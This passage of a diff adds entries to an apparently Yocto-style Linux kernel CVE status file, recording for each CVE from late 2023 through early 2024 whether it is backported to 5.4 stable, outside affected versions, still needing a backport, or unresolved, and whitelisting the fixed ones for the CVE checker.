+# CVE-2023-52561 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 6.0rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52562"
+
+# CVE-2023-52563 needs backporting (fixed from 6.6rc3)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52564"
+
+# CVE-2023-52565 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52566"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52567"
+
+# CVE-2023-52568 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52569 needs backporting (fixed from 6.6rc2)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52570"
+
+# CVE-2023-52571 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52572 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52573"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52574"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52575"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52576"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52577"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52578"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52580"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52581"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52582"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52583"
+
+# CVE-2023-52584 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52585 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52586 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52587"
+
+# CVE-2023-52588 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52589 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52590 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52591 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52593 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52594"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52595"
+
+# CVE-2023-52596 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52598"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52600"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52602"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52603"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52604"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52606"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52607"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52608"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52609"
+
+# CVE-2023-52610 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52611"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52612"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52613"
+
+# CVE-2023-52614 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52615"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52616"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52617"
+
+# CVE-2023-52618 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52619"
+
+# CVE-2023-52620 needs backporting (fixed from 6.4)
+
+# CVE-2023-52621 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52622"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52623"
+
+# CVE-2023-52624 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52625 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.7rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52626"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52627"
+
+# CVE-2023-52628 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52629 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52630"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52631"
+
+# CVE-2023-52632 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52633 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52634 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52635 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52636"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52637"
+
+# CVE-2023-52638 needs backporting (fixed from 6.8rc5)
+
+# CVE-2023-52639 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52640 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52641 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5345"
+
+# fixed-version: only affects 6.2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5633"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-5717"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6039"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-6040"
+
+# fixed-version: only affects 6.6rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6111"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6121"
+
+# fixed-version: only affects 5.7rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6176"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6200"
+
+# CVE-2023-6238 has no known resolution
+
+# CVE-2023-6240 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-6270"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6356"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6531"
+
+# CVE-2023-6535 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6536"
+
+# CVE-2023-6546 needs backporting (fixed from 6.5rc7)
+
+# CVE-2023-6560 needs backporting (fixed from 6.7rc4)
+
+# cpe-stable-backport: Backported in 5.4.266
+CVE_CHECK_WHITELIST += "CVE-2023-6606"
+
+# CVE-2023-6610 needs backporting (fixed from 6.7rc7)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6622"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6679"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6817"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6915"
+
+# cpe-stable-backport: Backported in 5.4.264
+CVE_CHECK_WHITELIST += "CVE-2023-6931"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6932"
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-7042"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-7192"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0193"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0340"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0443"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0562"
+
+# CVE-2024-0564 has no known resolution
+
+# CVE-2024-0565 needs backporting (fixed from 6.7rc6)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0582"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2024-0584"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0607"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0639"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0641"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2024-0646"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2024-0775"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-0841"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-1085"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-1086"
+
+# CVE-2024-1151 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-1312 needs backporting (fixed from 6.5rc4)
+
+# CVE-2024-21803 has no known resolution
+
+# CVE-2024-2193 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-22099"
+
+# CVE-2024-22386 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-22705"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2024-23196"
+
+# CVE-2024-23307 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-23848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-23849"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-23850"
+
+# CVE-2024-23851 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-24855 needs backporting (fixed from 6.5rc2)
+
+# CVE-2024-24857 has no known resolution
+
+# CVE-2024-24858 has no known resolution
+
+# CVE-2024-24859 has no known resolution
+
+# CVE-2024-24860 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-24861 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-24864 has no known resolution
+
+# CVE-2024-25739 has no known resolution
+
+# CVE-2024-25740 has no known resolution
+
+# CVE-2024-25741 has no known resolution
+
+# CVE-2024-25744 needs backporting (fixed from 6.7rc5)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26581"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26582"
+
+# fixed-version: only affects 5.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26583"
+
+# CVE-2024-26584 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26585 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26586 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26587"
+
+# fixed-version: only affects 6.1rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26588"
+
+# CVE-2024-26589 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26590"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26591"
+
+# CVE-2024-26592 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26593"
+
+# CVE-2024-26594 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26595 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26596"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26598"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26600"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26602"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26603"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26604"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26605"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26606"
+
+# CVE-2024-26607 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26608"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26610"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26611"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26612"
+
+# CVE-2024-26614 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26615"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26616"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26617"
+
+# fixed-version: only affects 6.5rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26618"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26619"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26620"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26621"
+
+# CVE-2024-26622 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26623 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26625"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26626"
+
+# CVE-2024-26627 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26629"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26630"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26631"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26632"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26633"
+
+# fixed-version: only affects 6.6rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26634"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26635"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26636"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26637"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26638"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26639"
+
+# CVE-2024-26640 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26641 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26642 needs backporting (fixed from 6.8)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26643"
+
+# CVE-2024-26644 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26645"
+
+# CVE-2024-26646 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26647 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26648 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26649"
+
+# CVE-2024-26650 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-26651"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26652"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26653"
+
+# CVE-2024-26654 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26655 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26656 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26657"
+
+# CVE-2024-26658 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26659 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26660"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26661"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26662"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26663"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26664"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26665"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26666"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26667"
+
+# CVE-2024-26668 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26669 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 6.6rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26670"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26671"
+
+# CVE-2024-26672 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26673"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26674"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26675"
+
+# CVE-2024-26676 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26677 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26678"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26679"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26680"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26681"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26682"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26683"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26684"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26685"
+
+# CVE-2024-26686 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26687 needs backporting (fixed from 6.8rc5)
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-26688"
+
+# CVE-2024-26689 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26690"
+
+# CVE-2024-26691 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26692"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26693"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26694"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26695"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26696"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26697"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26698"
+
+# CVE-2024-26699 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26700 needs backporting (fixed from 6.8rc4)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26702"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26703"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26704"
+
+# fixed-version: only affects 6.6rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26705"
+
+# CVE-2024-26706 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26707"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26708"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26709"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26710"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26711"
+
+# CVE-2024-26712 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26713 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26714"
+
+# CVE-2024-26715 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26716"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26717"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26718"
+
+# CVE-2024-26719 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26720"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26721"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26722"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26723"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26724"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26725"
+
+# CVE-2024-26726 needs backporting (fixed from 6.8rc5)
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26727"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26728"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26729"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26730"
+
+# fixed-version: only affects 6.4rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26731"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26732"
+
+# CVE-2024-26733 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26734"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26735"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26736"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26737"
+
+# CVE-2024-26738 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26739 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26740 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26741"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26742"
+
+# CVE-2024-26743 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26744 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26745 needs backporting (fixed from 6.8rc7)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26746"
+
+# CVE-2024-26747 needs backporting (fixed from 6.8rc6)
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26748"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26749"
+
+# fixed-version: only affects 6.8rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26750"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26751"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26752"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26753"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26754"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26755"
+
+# CVE-2024-26756 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26757 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26758 needs backporting (fixed from 6.8rc6)
+
+# CVE-2024-26759 needs backporting (fixed from 6.8rc6)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26760"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26761"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26762"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2024-26763"
+
+# cpe-stable-backport: Backported in 5.4.270
